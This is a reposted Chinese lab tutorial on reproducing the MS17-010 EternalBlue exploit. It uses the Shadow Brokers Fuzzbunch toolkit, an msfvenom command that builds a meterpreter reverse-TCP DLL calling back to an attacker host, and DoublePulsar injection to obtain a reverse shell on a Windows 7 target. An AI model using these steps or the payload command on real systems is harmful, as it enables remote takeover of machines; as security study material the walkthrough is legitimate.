【研究】ms17-010永恆之藍漏洞復現


1       永恆之藍漏洞復現(ms17-010)

1.1     漏洞描述:

Eternalblue通過TCP端口445和139來利用SMBv1和NBT中的遠程代碼執行漏洞,惡意代碼會掃描開放445文件共享端口的Windows機器,無需用戶任何操作,只要開機上網,不法分子就能在電腦和服務器中植入勒索軟件、遠程控制木馬、虛擬貨幣挖礦機等惡意程序。

1.2     漏洞影響:

目前已知受影響的 Windows 版本包括但不限於:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

1.3     漏洞復現:

1.3.1  環境搭建

攻擊機1: Kali-Linux-2017.1-vm-amd64      IP:192.168.1.250,

攻擊機2: windows7 x86 SP1                 IP:192.168.1.3

靶    機: windows7 x64                     IP:192.168.1.30

1.3.1.1 Windows7 (x86)攻擊機工具安裝及配置

Python  2.6https://www.python.org/download/releases/2.6/

PyWin32 v212https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/

Shadow Brokers工具包:https://github.com/misterch0c/shadowbroker.git

Python2.6工具直接安裝即可,PyWin32 v212的安裝需要以管理員權限執行,shadowbrokers-master直接解壓到指定目錄,在其子目錄windows中建立listeningposts文件夾,同時修改FuzzyBunch.xml文件內容,設置相應的ResourcesDir和LogDir參數值,修改結果如下圖所示。

 

 

 

 

 

驗證fuzzbunch是否成功安裝,結果如下圖所示。

 

界面顯示fuzzbunch版本等相關信息表示該工具已成功安裝。

1.3.2  Kali下生成木馬程序

Kali下生成木馬程序使用到metasploit framework中的msfvenom,具體參數可參考文檔:http://www.freebuf.com/sectool/72135.html。這里我們使用到-p和-f兩個參數,分別表示載荷和格式,具體命令為:

msfvenom –p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.250 LPORT=5555 –f dll > s.dll

說明:-p指定攻擊載荷,LHOST指定監聽地址,LPORT指定監聽端口,-f指定木馬程序格式為dll,>指定生成木馬程序的保存路徑,s.dll表示木馬程序保存在當前目錄下,我們可以通過ls查看。

 

 

1.3.3  Fuzzbunch基本配置

  將生成的木馬程序copy到win7攻擊機中c盤根目錄下。然后使用fuzzbunch做些簡單的配置,配置參數如下圖所示。

 

基本配置設置完成后,開始新建項目,根據提示,我們選擇5,然后給項目起個名稱,其它設置保持默認即可,結果如下圖所示。

 

  項目配置完成后,下面直接使用永恆之藍模塊建立后門,具體配置如以下各圖所示,除特別說明外,其它配置保持默認即可。

 

此處操作系統選擇1。

 

此處選擇1。

最終結果如下圖所示。

 

1.3.4  Kali下開啟監聽

同樣使用windows/x64/meterpreter/reverse_tcp載荷,具體參數設置如下圖所示。

 

參數配置完成后執行exploit命令。

1.3.5  注入s.dll木馬程序

在windows7(x86)攻擊機中使用Doublepulsar模塊向靶機注入木馬程序,具體過程如以下各圖所示,除特殊說明外,其它配置保持默認即可。

 

操作系統選擇64位的,如下圖所示。

 

指定木馬程序,如下圖所示。

 

1.3.6  Kali反彈shell結果

結果如以下各圖所示。

 

 

 

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM